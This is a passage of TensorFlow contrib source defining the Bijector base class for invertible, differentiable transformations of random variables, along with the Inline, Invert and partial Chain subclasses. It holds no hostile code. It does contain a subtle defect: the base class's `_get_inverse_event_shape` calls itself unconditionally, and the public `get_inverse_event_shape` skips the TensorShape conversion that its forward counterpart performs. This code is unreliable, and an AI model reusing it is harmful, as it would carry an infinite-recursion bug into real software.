# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Bijector Ops.
An API for invertible, differentiable transformations of random variables.
## Background
Differentiable, bijective transformations of continuous random variables alter
the calculations made in the cumulative/probability distribution functions and
sample function. This module provides a standard interface for making these
manipulations.
For more details and examples, see the `Bijector` docstring.
To apply a `Bijector`, use `distributions.TransformedDistribution`.
## Bijectors
@@Affine
@@AffineLinearOperator
@@Bijector
@@Chain
@@CholeskyOuterProduct
@@Exp
@@Identity
@@Inline
@@Invert
@@SigmoidCentered
@@SoftmaxCentered
@@Softplus
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import itertools
import math
import re
import numpy as np
import six
from tensorflow.contrib import framework as contrib_framework
from tensorflow.contrib.distributions.python.ops import operator_pd_cholesky
from tensorflow.contrib.distributions.python.ops import operator_pd_diag
from tensorflow.contrib.distributions.python.ops import operator_pd_identity
from tensorflow.contrib.distributions.python.ops import operator_pd_vdvt_update
from tensorflow.contrib.distributions.python.ops.shape import _DistributionShape
from tensorflow.contrib.linalg.python.ops import linear_operator
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
__all__ = [
"Affine",
"AffineLinearOperator",
"Bijector",
"Chain",
"CholeskyOuterProduct",
"Exp",
"Identity",
"Inline",
"Invert",
"PowerTransform",
"SigmoidCentered",
"SoftmaxCentered",
"Softplus",
]
# TODO(jvdillon): deprecate this function once tf.expm1 exists.
def _expm1(x):
"""Approximate exp{y}-1~=y for small |y|, and exp{y}-1 elsewhere."""
# Recall, eps is smallest positive number such that 1 + eps != 1.
eps = np.finfo(x.dtype.base_dtype.as_numpy_dtype).eps
# Note we are careful to never send an NaN through ANY branch of where.
return array_ops.where(math_ops.less(math_ops.abs(x), eps),
x, math_ops.exp(x) - 1.)
def _as_tensor(x, name):
"""Convenience to convert to `Tensor` or leave as `None`."""
return None if x is None else ops.convert_to_tensor(x, name=name)
class _Mapping(collections.namedtuple("_Mapping",
["x", "y", "ildj", "condition_kwargs"])):
"""Helper class to make it easier to manage caching in `Bijector`."""
def __new__(cls, x=None, y=None, ildj=None, condition_kwargs=None):
"""Custom __new__ so namedtuple items have defaults.
Args:
x: `Tensor`. Forward.
y: `Tensor`. Inverse.
ildj: `Tensor`. Inverse log det Jacobian.
condition_kwargs: Python dictionary. Extra args supplied to
forward/inverse/etc functions.
Returns:
mapping: New instance of _Mapping.
"""
return super(_Mapping, cls).__new__(cls, x, y, ildj, condition_kwargs)
@property
def x_key(self):
"""Returns key used for caching Y=g(X)."""
return (self.x,) + self._deep_tuple(tuple(sorted(
self.condition_kwargs.items())))
@property
def y_key(self):
"""Returns key used for caching X=g^{-1}(Y)."""
return (self.y,) + self._deep_tuple(tuple(sorted(
self.condition_kwargs.items())))
def merge(self, x=None, y=None, ildj=None,
condition_kwargs=None, mapping=None):
"""Returns new _Mapping with args merged with self.
Args:
x: `Tensor`. Forward.
y: `Tensor`. Inverse.
ildj: `Tensor`. Inverse log det Jacobian.
condition_kwargs: Python dictionary. Extra args supplied to
forward/inverse/etc functions.
mapping: Instance of _Mapping to merge. Can only be specified if no other
arg is specified.
Returns:
mapping: New instance of `_Mapping` which has inputs merged with self.
Raises:
ValueError: if mapping and any other arg is not `None`.
"""
if mapping is None:
mapping = _Mapping(x=x, y=y, ildj=ildj,
condition_kwargs=condition_kwargs)
elif not all(arg is None for arg in [x, y, ildj, condition_kwargs]):
raise ValueError("Cannot specify mapping and individual args.")
return _Mapping(
x=self._merge(self.x, mapping.x),
y=self._merge(self.y, mapping.y),
ildj=self._merge(self.ildj, mapping.ildj),
condition_kwargs=self._merge(self.condition_kwargs,
mapping.condition_kwargs))
def _merge(self, old, new):
"""Helper to merge which handles merging one value."""
if old is None:
return new
elif new is not None and old != new:
raise ValueError("Incompatible values: %s != %s" % (old, new))
return old
def _deep_tuple(self, x):
"""Converts lists of lists to tuples of tuples."""
return (tuple(map(self._deep_tuple, x))
if isinstance(x, (list, tuple)) else x)
@six.add_metaclass(abc.ABCMeta)
class Bijector(object):
"""Interface for transforming a `Distribution` sample.
A `Bijector` implements a
[diffeomorphism](https://en.wikipedia.org/wiki/Diffeomorphism), i.e., a
bijective, differentiable function. A `Bijector` is used by
`TransformedDistribution` but can be generally used for transforming a
`Distribution` generated `Tensor`. A `Bijector` is characterized by three
operations:
1. Forward Evaluation
Useful for turning one random outcome into another random outcome from a
different distribution.
2. Inverse Evaluation
Useful for "reversing" a transformation to compute one probability in
terms of another.
3. (log o det o Jacobian o inverse)(x)
"The log of the determinant of the matrix of all first-order partial
derivatives of the inverse function."
Useful for inverting a transformation to compute one probability in terms
of another. Geometrically, the det(Jacobian) is the volume of the
transformation and is used to scale the probability.
By convention, transformations of random variables are named in terms of the
forward transformation. The forward transformation creates samples, the
inverse is useful for computing probabilities.
Example Use:
- Basic properties:
```python
x = ... # A tensor.
# Evaluate forward transformation.
fwd_x = my_bijector.forward(x)
x == my_bijector.inverse(fwd_x)
x != my_bijector.forward(fwd_x) # Not equal because g(x) != g(g(x)).
```
- Computing a log-likelihood:
```python
def transformed_log_pdf(bijector, log_pdf, x):
return (bijector.inverse_log_det_jacobian(x) +
log_pdf(bijector.inverse(x)))
```
- Transforming a random outcome:
```python
def transformed_sample(bijector, x):
return bijector.forward(x)
```
Example transformations:
- "Exponential"
```
Y = g(X) = exp(X)
X ~ Normal(0, 1) # Univariate.
```
Implies:
```
g^{-1}(Y) = log(Y)
|Jacobian(g^{-1})(y)| = 1 / y
Y ~ LogNormal(0, 1), i.e.,
prob(Y=y) = |Jacobian(g^{-1})(y)| * prob(X=g^{-1}(y))
= (1 / y) Normal(log(y); 0, 1)
```
Here is an example of how one might implement the `Exp` bijector:
```
class Exp(Bijector):
def __init__(self, event_ndims=0, validate_args=False, name="exp"):
super(Exp, self).__init__(batch_ndims=0, event_ndims=event_ndims,
validate_args=validate_args, name=name)
def _forward(self, x):
return math_ops.exp(x)
def _inverse_and_inverse_log_det_jacobian(self, y):
x = math_ops.log(y)
return x, -self._forward_log_det_jacobian(x)
def _forward_log_det_jacobian(self, x):
if self.shaper is None:
raise ValueError("Jacobian requires known event_ndims.")
_, _, event_dims = self.shaper.get_dims(x)
return math_ops.reduce_sum(x, reduction_indices=event_dims)
```
- "Affine"
```
Y = g(X) = sqrtSigma * X + mu
X ~ MultivariateNormal(0, I_d)
```
Implies:
```
g^{-1}(Y) = inv(sqrtSigma) * (Y - mu)
|Jacobian(g^{-1})(y)| = det(inv(sqrtSigma))
Y ~ MultivariateNormal(mu, sqrtSigma) , i.e.,
prob(Y=y) = |Jacobian(g^{-1})(y)| * prob(X=g^{-1}(y))
= det(sqrtSigma)^(-d) *
MultivariateNormal(inv(sqrtSigma) * (y - mu); 0, I_d)
```
Example of why a `Bijector` needs to understand sample, batch, event
partitioning:
- Consider the `Exp` `Bijector` applied to a `Tensor` which has sample, batch,
and event (S, B, E) shape semantics. Suppose
the `Tensor`'s partitioned-shape is `(S=[4], B=[2], E=[3, 3])`.
For `Exp`, the shape of the `Tensor` returned by `forward` and `inverse` is
unchanged, i.e., `[4, 2, 3, 3]`. However the shape returned by
`inverse_log_det_jacobian` is `[4, 2]` because the Jacobian is a reduction
over the event dimensions.
Subclass Requirements:
- Typically subclasses implement `_forward` and one or both of:
- `_inverse`, `_inverse_log_det_jacobian`,
- `_inverse_and_inverse_log_det_jacobian`.
- If the `Bijector`'s use is limited to `TransformedDistribution` (or friends
like `QuantizedDistribution`) then depending on your use, you may not need
to implement all of `_forward` and `_inverse` functions. Examples:
1. Sampling (e.g., `sample`) only requires `_forward`.
2. Probability functions (e.g., `prob`, `cdf`, `survival`) only require
`_inverse` (and related).
3. Only calling probability functions on the output of `sample` means
`_inverse` can be implemented as a cache lookup.
See `Example Use` [above] which shows how these functions are used to
transform a distribution. (Note: `_forward` could theoretically be
implemented as a cache lookup but this would require controlling the
underlying sample generation mechanism.)
- If computation can be shared among `_inverse` and
`_inverse_log_det_jacobian` it is preferable to implement
`_inverse_and_inverse_log_det_jacobian`. This usually reduces
graph-construction overhead because a `Distribution`'s implementation of
`log_prob` will need to evaluate both the inverse Jacobian as well as the
inverse function.
- If an additional use case needs just `inverse` or just
`inverse_log_det_jacobian` then he or she may also wish to implement these
functions to avoid computing the `inverse_log_det_jacobian` or the
`inverse`, respectively.
- Subclasses should implement `_get_forward_event_shape`,
`_forward_event_shape` (and `inverse` counterparts) if the transformation is
shape-changing. By default the event-shape is assumed unchanged from input.
Tips for implementing `_inverse` and `_inverse_log_det_jacobian`:
- As case 3 [above] indicates, under some circumstances the inverse function
can be implemented as a cache lookup.
- The inverse `log o det o Jacobian` can be implemented as the negative of the
forward `log o det o Jacobian`. This is useful if the `inverse` is
implemented as a cache or the inverse Jacobian is computationally more
expensive (e.g., `CholeskyOuterProduct` `Bijector`). The following
demonstrates the suggested implementation.
```python
def _inverse_and_log_det_jacobian(self, y):
x = # ... implement inverse, possibly via cache.
return x, -self._forward_log_det_jac(x) # Note negation.
```
By overriding the `_inverse_and_log_det_jacobian` function we have access to
the inverse in one call.
The correctness of this approach can be seen from the following claim.
- Claim:
Assume `Y=g(X)` is a bijection whose derivative exists and is nonzero
for its domain, i.e., `d/dX g(X)!=0`. Then:
```none
(log o det o jacobian o g^{-1})(Y) = -(log o det o jacobian o g)(X)
```
- Proof:
From the bijective, nonzero differentiability of `g`, the
[inverse function theorem](
https://en.wikipedia.org/wiki/Inverse_function_theorem)
implies `g^{-1}` is differentiable in the image of `g`.
Applying the chain rule to `y = g(x) = g(g^{-1}(y))` yields
`I = g'(g^{-1}(y))*g^{-1}'(y)`.
The same theorem also implies `g{-1}'` is non-singular therefore:
`inv[ g'(g^{-1}(y)) ] = g^{-1}'(y)`.
The claim follows from [properties of determinant](
https://en.wikipedia.org/wiki/Determinant#Multiplicativity_and_matrix_groups).
- If possible, prefer a direct implementation of the inverse Jacobian. This
should have superior numerical stability and will often share subgraphs with
the `_inverse` implementation.
"""
@abc.abstractmethod
def __init__(self,
batch_ndims=None,
event_ndims=None,
graph_parents=None,
is_constant_jacobian=False,
validate_args=False,
dtype=None,
name=None):
"""Constructs Bijector.
A `Bijector` transforms random variables into new random variables.
Examples:
```python
# Create the Y = g(X) = X transform which operates on 4-Tensors of vectors.
identity = Identity(batch_ndims=4, event_ndims=1)
# Create the Y = g(X) = exp(X) transform which operates on matrices.
exp = Exp(batch_ndims=0, event_ndims=2)
```
See `Bijector` subclass docstring for more details and specific examples.
Args:
batch_ndims: number of dimensions associated with batch coordinates.
event_ndims: number of dimensions associated with event coordinates.
graph_parents: Python list of graph prerequisites of this `Bijector`.
is_constant_jacobian: `Boolean` indicating that the Jacobian is not a
function of the input.
validate_args: `Boolean`, default `False`. Whether to validate input with
asserts. If `validate_args` is `False`, and the inputs are invalid,
correct behavior is not guaranteed.
dtype: `tf.dtype` supported by this `Bijector`. `None` means dtype is not
enforced.
name: The name to give Ops created by the initializer.
"""
if batch_ndims is None or event_ndims is None:
self._shaper = None # Apparently subclass will create.
else:
self._shaper = _DistributionShape(
batch_ndims=batch_ndims,
event_ndims=event_ndims,
validate_args=validate_args)
self._graph_parents = graph_parents or []
self._is_constant_jacobian = is_constant_jacobian
self._validate_args = validate_args
self._dtype = dtype
self._from_y = {}
self._from_x = {}
# Using abbreviation ildj for "inverse log det Jacobian."
# This variable is not `None` iff is_constant_jacobian is `True`.
self._constant_ildj = None
if name:
self._name = name
else:
# We want the default convention to be snake_case rather than CamelCase
# since `Chain` uses bijector.name as the condition_kwargs dictionary key.
def camel_to_snake(name):
s1 = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", name)
return re.sub("([a-z0-9])([A-Z])", r"\1_\2", s1).lower()
self._name = camel_to_snake(type(self).__name__)
@property
def shaper(self):
"""Returns shape object used to manage shape constraints."""
return self._shaper
@property
def graph_parents(self):
"""Returns this `Bijector`'s graph_parents as a Python list."""
return self._graph_parents
@property
def is_constant_jacobian(self):
"""Returns true iff the Jacobian is not a function of x.
Note: Jacobian is either constant for both forward and inverse or neither.
Returns:
`Boolean`.
"""
return self._is_constant_jacobian
@property
def validate_args(self):
"""Returns True if Tensor arguments will be validated."""
return self._validate_args
@property
def dtype(self):
"""dtype of `Tensor`s transformable by this distribution."""
return self._dtype
@property
def name(self):
"""Returns the string name of this `Bijector`."""
return self._name
def _forward_event_shape(self, input_shape):
"""Subclass implementation for `forward_event_shape` public function."""
return input_shape
def forward_event_shape(self, input_shape, name="forward_event_shape"):
"""Shape of a single sample from a single batch as an `int32` 1D `Tensor`.
Args:
input_shape: `Tensor`, `int32` vector indicating event-portion shape
passed into `forward` function.
name: name to give to the op
Returns:
forward_event_shape: `Tensor`, `int32` vector indicating event-portion
shape after applying `forward`.
"""
with self._name_scope(name, [input_shape]):
input_shape = ops.convert_to_tensor(input_shape, dtype=dtypes.int32,
name="input_shape")
return self._forward_event_shape(input_shape)
def _get_forward_event_shape(self, input_shape):
"""Subclass implementation for `get_forward_event_shape` public function."""
return input_shape
def get_forward_event_shape(self, input_shape):
"""Shape of a single sample from a single batch as a `TensorShape`.
Same meaning as `forward_event_shape`. May be only partially defined.
Args:
input_shape: `TensorShape` indicating event-portion shape passed into
`forward` function.
Returns:
forward_event_shape: `TensorShape` indicating event-portion shape after
applying `forward`. Possibly unknown.
"""
return self._get_forward_event_shape(tensor_shape.TensorShape(input_shape))
def _inverse_event_shape(self, output_shape):
"""Subclass implementation for `inverse_event_shape` public function."""
return output_shape
def inverse_event_shape(self, output_shape, name="inverse_event_shape"):
"""Shape of a single sample from a single batch as an `int32` 1D `Tensor`.
Args:
output_shape: `Tensor`, `int32` vector indicating event-portion shape
passed into `inverse` function.
name: name to give to the op
Returns:
inverse_event_shape: `Tensor`, `int32` vector indicating event-portion
shape after applying `inverse`.
"""
with self._name_scope(name, [output_shape]):
output_shape = ops.convert_to_tensor(output_shape, dtype=dtypes.int32,
name="output_shape")
return self._inverse_event_shape(output_shape)
def _get_inverse_event_shape(self, output_shape):
"""Subclass implementation for `get_inverse_event_shape` public function."""
return self._get_inverse_event_shape(tensor_shape.TensorShape(output_shape))
def get_inverse_event_shape(self, output_shape):
"""Shape of a single sample from a single batch as a `TensorShape`.
Same meaning as `inverse_event_shape`. May be only partially defined.
Args:
output_shape: `TensorShape` indicating event-portion shape passed into
`inverse` function.
Returns:
inverse_event_shape: `TensorShape` indicating event-portion shape after
applying `inverse`. Possibly unknown.
"""
return self._get_inverse_event_shape(output_shape)
def _forward(self, x):
"""Subclass implementation for `forward` public function."""
raise NotImplementedError("forward not implemented.")
def forward(self, x, name="forward", **condition_kwargs):
"""Returns the forward `Bijector` evaluation, i.e., X = g(Y).
Args:
x: `Tensor`. The input to the "forward" evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
TypeError: if `self.dtype` is specified and `x.dtype` is not
`self.dtype`.
NotImplementedError: if `_forward` is not implemented.
"""
with self._name_scope(name, [x]):
x = ops.convert_to_tensor(x, name="x")
self._maybe_assert_dtype(x)
mapping = self._lookup(x=x, condition_kwargs=condition_kwargs)
if mapping.y is not None:
return mapping.y
mapping = mapping.merge(y=self._forward(x, **condition_kwargs))
self._cache(mapping)
return mapping.y
def _inverse(self, y):
"""Subclass implementation for `inverse` public function."""
raise NotImplementedError("inverse not implemented")
def inverse(self, y, name="inverse", **condition_kwargs):
"""Returns the inverse `Bijector` evaluation, i.e., X = g^{-1}(Y).
Args:
y: `Tensor`. The input to the "inverse" evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
TypeError: if `self.dtype` is specified and `y.dtype` is not
`self.dtype`.
NotImplementedError: if neither `_inverse` nor
`_inverse_and_inverse_log_det_jacobian` are implemented.
"""
with self._name_scope(name, [y]):
y = ops.convert_to_tensor(y, name="y")
self._maybe_assert_dtype(y)
mapping = self._lookup(y=y, condition_kwargs=condition_kwargs)
if mapping.x is not None:
return mapping.x
ildj = None
try:
x = self._inverse(y, **condition_kwargs)
except NotImplementedError as original_error:
# Since _inverse was not implemented, try to see if it's implemented
# by the _inverse_and_inverse_log_det_jacobian member.
try:
x, ildj = self._inverse_and_inverse_log_det_jacobian(
y, **condition_kwargs)
except NotImplementedError:
raise original_error
if self._constant_ildj is not None:
ildj = self._constant_ildj # Use the "global" result.
elif self.is_constant_jacobian:
self._constant_ildj = ildj
x = x if mapping.x is None else mapping.x
mapping = mapping.merge(x=x, ildj=ildj)
self._cache(mapping)
return mapping.x
def _inverse_log_det_jacobian(self, y):
"""Subclass implementation for `inverse_log_det_jacobian` public function.""" # pylint: disable=line-too-long
raise NotImplementedError("inverse_log_det_jacobian not implemented.")
def inverse_log_det_jacobian(
self, y, name="inverse_log_det_jacobian", **condition_kwargs):
"""Returns the (log o det o Jacobian o inverse)(y).
Mathematically, returns: `log(det(dX/dY))(Y)`. (Recall that: `X=g^{-1}(Y)`.)
Note that `forward_log_det_jacobian` is the negative of this function.
Args:
y: `Tensor`. The input to the "inverse" Jacobian evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
TypeError: if `self.dtype` is specified and `y.dtype` is not
`self.dtype`.
NotImplementedError: if neither `_inverse_log_det_jacobian` nor
`_inverse_and_inverse_log_det_jacobian` are implemented.
"""
with self._name_scope(name, [y]):
if self._constant_ildj is not None:
return self._constant_ildj
y = ops.convert_to_tensor(y, name="y")
self._maybe_assert_dtype(y)
mapping = self._lookup(y=y, condition_kwargs=condition_kwargs)
if mapping.ildj is not None:
return mapping.ildj
try:
x = mapping.x
ildj = self._inverse_log_det_jacobian(y, **condition_kwargs)
except NotImplementedError as original_error:
# Since _inverse_log_det_jacobian was not implemented, try to see if
# it's implemented by the _inverse_and_inverse_log_det_jacobian member.
try:
x, ildj = self._inverse_and_inverse_log_det_jacobian(
y, **condition_kwargs)
except NotImplementedError:
raise original_error
if mapping.x is not None:
x = mapping.x
if self.is_constant_jacobian:
self._constant_ildj = ildj
x = x if mapping.x is None else mapping.x
mapping = mapping.merge(x=x, ildj=ildj)
self._cache(mapping)
return mapping.ildj
def _inverse_and_inverse_log_det_jacobian(self, y):
"""Subclass implementation for `inverse_and_inverse_log_det_jacobian` public function.""" # pylint: disable=line-too-long
raise NotImplementedError(
"inverse_and_inverse_log_det_jacobian not implemented.")
def inverse_and_inverse_log_det_jacobian(
self, y, name="inverse_and_inverse_log_det_jacobian", **condition_kwargs):
"""Returns both the inverse evaluation and inverse_log_det_jacobian.
Enables possibly more efficient calculation when both inverse and
corresponding Jacobian are needed.
See `inverse()`, `inverse_log_det_jacobian()` for more details.
Args:
y: `Tensor`. The input to the "inverse" Jacobian evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
TypeError: if `self.dtype` is specified and `y.dtype` is not
`self.dtype`.
NotImplementedError: if neither `_inverse_and_inverse_log_det_jacobian`
nor {`_inverse`, `_inverse_log_det_jacobian`} are implemented.
"""
with self._name_scope(name, [y]):
y = ops.convert_to_tensor(y, name="y")
self._maybe_assert_dtype(y)
mapping = self._lookup(y=y, condition_kwargs=condition_kwargs)
if mapping.x is not None and mapping.ildj is not None:
return mapping.x, mapping.ildj
try:
x, ildj = self._inverse_and_inverse_log_det_jacobian(
y, **condition_kwargs)
except NotImplementedError as original_error:
# Since _inverse_and_inverse_log_det_jacobian was not implemented, try
# to see if we can separately use _inverse and
# _inverse_log_det_jacobian members.
try:
# We want this same try/except to catch either NotImplementedError.
x = self._inverse(y, **condition_kwargs)
if self._constant_ildj is None:
ildj = self._inverse_log_det_jacobian(y, **condition_kwargs)
except NotImplementedError:
raise original_error
if self._constant_ildj is not None:
ildj = self._constant_ildj # Ignore any ildj we may/not have.
elif self.is_constant_jacobian:
self._constant_ildj = ildj
# We use the mapped version of x, even if we re-computed x above with a
# call to self._inverse_and_inverse_log_det_jacobian. This prevents
# re-evaluation of the inverse in a common case.
x = x if mapping.x is None else mapping.x
mapping = mapping.merge(x=x, ildj=ildj)
self._cache(mapping)
return mapping.x, mapping.ildj
def _forward_log_det_jacobian(self, x):
"""Subclass implementation for `forward_log_det_jacobian` public function.""" # pylint: disable=line-too-long
raise NotImplementedError(
"forward_log_det_jacobian not implemented.")
def forward_log_det_jacobian(
self, x, name="forward_log_det_jacobian", **condition_kwargs):
"""Returns both the forward_log_det_jacobian.
Args:
x: `Tensor`. The input to the "forward" Jacobian evaluation.
name: The name to give this op.
**condition_kwargs: Named arguments forwarded to subclass implementation.
Returns:
`Tensor`.
Raises:
TypeError: if `self.dtype` is specified and `y.dtype` is not
`self.dtype`.
NotImplementedError: if neither `_forward_log_det_jacobian`
nor {`_inverse`, `_inverse_log_det_jacobian`} are implemented.
"""
with self._name_scope(name, [x]):
if self._constant_ildj is not None:
# Need "-1. *" to avoid invalid-unary-operand-type linter warning.
return -1. * self._constant_ildj
x = ops.convert_to_tensor(x, name="x")
self._maybe_assert_dtype(x)
mapping = self._lookup(x=x, condition_kwargs=condition_kwargs)
if mapping.ildj is not None:
return -mapping.ildj
y = None
try:
ildj = -self._forward_log_det_jacobian(x, **condition_kwargs)
except NotImplementedError as original_error:
try:
# We want this same try/except to catch either NotImplementedError.
y = self.inverse(x, **condition_kwargs) if y is None else y
ildj = self.inverse_log_det_jacobian(y, **condition_kwargs)
except NotImplementedError:
raise original_error
if self.is_constant_jacobian:
self._constant_ildj = ildj
y = y if mapping.y is None else mapping.y
mapping = mapping.merge(y=y, ildj=ildj)
self._cache(mapping)
return -mapping.ildj
@contextlib.contextmanager
def _name_scope(self, name=None, values=None):
"""Helper function to standardize op scope."""
with ops.name_scope(self.name):
with ops.name_scope(
name, values=(values or []) + self.graph_parents) as scope:
yield scope
def _maybe_assert_dtype(self, x):
"""Helper to check dtype when self.dtype is known."""
if self.dtype is not None and self.dtype.base_dtype != x.dtype.base_dtype:
raise TypeError("Input had dtype %s but expected %s." %
(self.dtype, x.dtype))
def _cache(self, mapping):
"""Helper which stores mapping info in forward/inverse dicts."""
if self._constant_ildj is not None:
# Fold in ildj if known constant Jacobian.
mapping = mapping.merge(ildj=self._constant_ildj)
# Merging from lookup is an added check that we're not overwriting anything
# which is not None.
mapping = mapping.merge(mapping=self._lookup(
mapping.x, mapping.y, mapping.condition_kwargs))
if mapping.x is None and mapping.y is None:
raise ValueError("Caching expects at least one of (x,y) to be known, "
"i.e., not None.")
self._from_x[mapping.x_key] = mapping
self._from_y[mapping.y_key] = mapping
def _lookup(self, x=None, y=None, condition_kwargs=None):
"""Helper which retrieves mapping info from forward/inverse dicts."""
mapping = _Mapping(x=x, y=y, condition_kwargs=condition_kwargs)
# Since _cache requires both x,y to be set, we only need to do one cache
# lookup since the mapping is always in both or neither.
if mapping.x is not None:
return self._from_x.get(mapping.x_key, mapping)
if mapping.y is not None:
return self._from_y.get(mapping.y_key, mapping)
return mapping
class Inline(Bijector):
# pylint: disable=line-too-long
"""Bijector constructed from callables implementing forward, inverse, and inverse_log_det_jacobian.
Example Use:
```python
exp = Inline(
forward_fn=tf.exp,
inverse_fn=tf.log,
inverse_log_det_jacobian_fn=(
lambda y: -tf.reduce_sum(tf.log(y), reduction_indices=-1)),
name="exp")
```
The above example is equivalent to the `Bijector` `Exp(event_ndims=1)`.
"""
# pylint: enable=line-too-long
def __init__(self,
forward_fn=None,
inverse_fn=None,
inverse_log_det_jacobian_fn=None,
forward_log_det_jacobian_fn=None,
get_forward_event_shape_fn=None,
forward_event_shape_fn=None,
get_inverse_event_shape_fn=None,
inverse_event_shape_fn=None,
is_constant_jacobian=False,
validate_args=False,
name="inline"):
"""Creates a `Bijector` from callables.
Args:
forward_fn: Python callable implementing the forward transformation.
inverse_fn: Python callable implementing the inverse transformation.
inverse_log_det_jacobian_fn: Python callable implementing the
log o det o jacobian of the inverse transformation.
forward_log_det_jacobian_fn: Python callable implementing the
log o det o jacobian of the forward transformation.
get_forward_event_shape_fn: Python callable implementing non-identical
static event shape changes. Default: shape is assumed unchanged.
forward_event_shape_fn: Python callable implementing non-identical event
shape changes. Default: shape is assumed unchanged.
get_inverse_event_shape_fn: Python callable implementing non-identical
static event shape changes. Default: shape is assumed unchanged.
inverse_event_shape_fn: Python callable implementing non-identical event
shape changes. Default: shape is assumed unchanged.
is_constant_jacobian: `Boolean` indicating that the Jacobian is constant
for all input arguments.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String`, name given to ops managed by this object.
"""
super(Inline, self).__init__(
batch_ndims=0,
event_ndims=0,
is_constant_jacobian=is_constant_jacobian,
validate_args=validate_args,
name=name)
self._forward_fn = forward_fn
self._inverse_fn = inverse_fn
self._inverse_log_det_jacobian_fn = inverse_log_det_jacobian_fn
self._forward_log_det_jacobian_fn = forward_log_det_jacobian_fn
self._get_forward_event_shape_fn = get_forward_event_shape_fn
self._forward_event_shape_fn = forward_event_shape_fn
self._get_inverse_event_shape_fn = get_inverse_event_shape_fn
self._inverse_event_shape_fn = inverse_event_shape_fn
def _get_forward_event_shape(self, input_shape):
if self._get_forward_event_shape_fn is None:
# By default assume shape doesn't change.
return input_shape
return self._get_forward_event_shape_fn(input_shape)
def _forward_event_shape(self, input_shape):
if self._forward_event_shape_fn is None:
# By default assume shape doesn't change.
return input_shape
return self._forward_event_shape_fn(input_shape)
def _get_inverse_event_shape(self, output_shape):
if self._get_inverse_event_shape_fn is None:
# By default assume shape doesn't change.
return output_shape
return self._get_inverse_event_shape_fn(output_shape)
def _inverse_event_shape(self, output_shape):
if self._inverse_event_shape_fn is None:
# By default assume shape doesn't change.
return output_shape
return self._inverse_event_shape_fn(output_shape)
def _forward(self, x, **condition_kwargs):
if not callable(self._forward_fn):
raise NotImplementedError(
"forward_fn is not a callable function.")
return self._forward_fn(x, **condition_kwargs)
def _inverse(self, y, **condition_kwargs):
if not callable(self._inverse_fn):
raise NotImplementedError(
"inverse_fn is not a callable function.")
return self._inverse_fn(y, **condition_kwargs)
def _inverse_log_det_jacobian(self, y, **condition_kwargs):
if not callable(self._inverse_log_det_jacobian_fn):
raise NotImplementedError(
"inverse_log_det_jacobian_fn is not a callable function.")
return self._inverse_log_det_jacobian_fn(y, **condition_kwargs)
def _forward_log_det_jacobian(self, y, **condition_kwargs):
if not callable(self._forward_log_det_jacobian_fn):
raise NotImplementedError(
"forward_log_det_jacobian_fn is not a callable function.")
return self._forward_log_det_jacobian_fn(y, **condition_kwargs)
class Invert(Bijector):
"""Bijector which inverts another Bijector.
Example Use: [ExpGammaDistribution (see Background & Context)](
https://reference.wolfram.com/language/ref/ExpGammaDistribution.html)
models `Y=log(X)` where `X ~ Gamma`.
```python
exp_gamma_distribution = TransformedDistribution(
Gamma(alpha=1., beta=2.),
bijector.Invert(bijector.Exp())
```
"""
def __init__(self, bijector, validate_args=False, name=None):
"""Creates a `Bijector` which swaps the meaning of `inverse` and `forward`.
Note: An inverted bijector's `inverse_log_det_jacobian` is often more
efficient if the base bijector implements `_forward_log_det_jacobian`. If
`_forward_log_det_jacobian` is not implemented then the following code is
used:
```python
y = self.inverse(x, **condition_kwargs)
return -self.inverse_log_det_jacobian(y, **condition_kwargs)
```
Args:
bijector: Bijector instance.
validate_args: `Boolean` indicating whether arguments should be checked
for correctness.
name: `String`, name given to ops managed by this object.
"""
self._bijector = bijector
super(Invert, self).__init__(
graph_parents=bijector.graph_parents,
is_constant_jacobian=bijector.is_constant_jacobian,
validate_args=validate_args,
dtype=bijector.dtype,
name=name or "_".join(["invert", bijector.name]))
self._shaper = bijector.shaper
def _get_forward_event_shape(self, input_shape):
return self.bijector.get_inverse_event_shape(input_shape)
def _forward_event_shape(self, input_shape):
return self.bijector.inverse_event_shape(input_shape)
def _get_inverse_event_shape(self, output_shape):
return self.bijector.get_forward_event_shape(output_shape)
def _inverse_event_shape(self, output_shape):
return self.bijector.forward_event_shape(output_shape)
@property
def bijector(self):
return self._bijector
def _forward(self, x, **condition_kwargs):
return self.bijector.inverse(x, **condition_kwargs)
def _inverse_and_inverse_log_det_jacobian(self, y, **condition_kwargs):
return (self.bijector.forward(y, **condition_kwargs),
self.bijector.forward_log_det_jacobian(y, **condition_kwargs))
def _forward_log_det_jacobian(self, x, **condition_kwargs):
return self.bijector.inverse_log_det_jacobian(x, **condition_kwargs)
class Chain(Bijector):
"""Bijector which applies a sequence of bijectors.
Example Use:
```python
chain = Chain([Exp(), Softplus()], name="one_plus_exp")
```
Results in:
* Forward:
```python
exp = Exp()
softplus = Softplus()
Chain([exp, softplus]).forward(x)
= exp.forward(softplus.forward(x))
= tf.exp(tf.log(1. + tf.exp(x)))
= 1. + tf.exp(x)
```
* Inverse:
```python
exp = Exp()
softplus = Softplus()
Chain([exp, softplus]).inverse(y)
= softplus.inverse(exp.inverse(y))
= tf.log(tf.exp(tf.log(y)) - 1.)
= tf.log(y - 1.)
```
"""
def __init__(self, bijectors=(), validate_args=False, name=None):
"""Instantiates `Chain` bijector.
Args:
bijectors: Python list of bijector instances. An empty list makes this
bijector equivalent to the `Identity` bijector.
validate_args: `Boolean` indicating whether arguments should be checked
